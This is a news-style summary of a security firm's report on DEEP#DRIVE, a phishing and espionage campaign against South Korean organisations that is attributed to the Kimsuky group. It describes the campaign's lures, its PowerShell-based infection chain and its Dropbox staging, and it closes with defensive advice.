A recent phishing attack known as DEEP#DRIVE has emerged as a significant threat to entities in South Korea, with thousands of victims reported. Cybersecurity experts suspect the Kimsuky group, a North Korean hacking collective, is behind this extensive cyber espionage campaign aimed primarily at South Korean businesses, government agencies, and cryptocurrency users. Since its inception in September 2024, the attack has predominantly focused on espionage, seeking to extract sensitive information from its targets.
In an investigation released by Securonix, details underline the multifaceted nature of the DEEP#DRIVE campaign. The attackers have effectively utilized phishing tactics by crafting authentic-looking documents in Korean, such as work logs, insurance papers, and cryptocurrency-related files. This carefully planned approach has enabled them to infiltrate targeted systems, thereby amplifying the impact of their operations.
Securonix also highlighted a specific phishing lure masquerading as the Telegram.exe application under the title 대차 및 파레트, relating to logistics operations. This particular lure contained critical logistics information, including product names and specifications, indicating a calculated effort to ensnare individuals within the logistics sector.
The attackers have distributed these deceptive lures in commonly trusted file formats like .hwp, .xlsx, and .pptx, hosted on reputable platforms such as Dropbox. By doing so, they have effectively avoided conventional security measures, allowing them to blend into normal user activity seamlessly.
According to researchers from Securonix, phishing was the core method of infection in this campaign, with collected samples and file names showing a strong correlation with typical phishing tactics. The reliance on phishing aligns closely with techniques outlined in the MITRE ATT&CK framework, particularly regarding initial access.
The attack also made extensive use of PowerShell scripts for various objectives, including payload delivery, reconnaissance to gather system data, and establishing persistence via scheduled tasks. The attack chain frequently initiated with a disguised .lnk file that activated malicious PowerShell scripts, leading to the download of further malicious payloads, including a .NET assembly concealed as legitimate software.
Although the final payload’s specifics remain unclear, its potential role as a backdoor indicates a sophisticated level of deception. Analyzing the attackers’ Dropbox account revealed numerous compromised system configuration files, underscoring their focus on stealth and avoidance of detection. Attackers utilized obfuscation techniques, including non-meaningful variable names and irrelevant coding assignments, to circumvent security systems, highlighting their tactical acuity.
While the malicious infrastructure appeared to be transient, the tactics and techniques exhibited in the DEEP#DRIVE campaign closely resemble those employed by the Kimsuky group, which is notorious for its ongoing targeting of South Korea utilizing Dropbox-based strategies in past assaults. To mitigate risks associated with such attacks, Securonix advises proactive user education on phishing, enhanced monitoring of malware staging areas, and robust endpoint logging practices.
In summary, the DEEP#DRIVE campaign exemplifies a sophisticated and multi-layered approach to cyber espionage, leveraging social engineering tactics tailored for specific sectors. The focus on utilizing familiar platforms for distribution significantly increases the challenge for organizations striving to secure their digital environments against persistent threats.
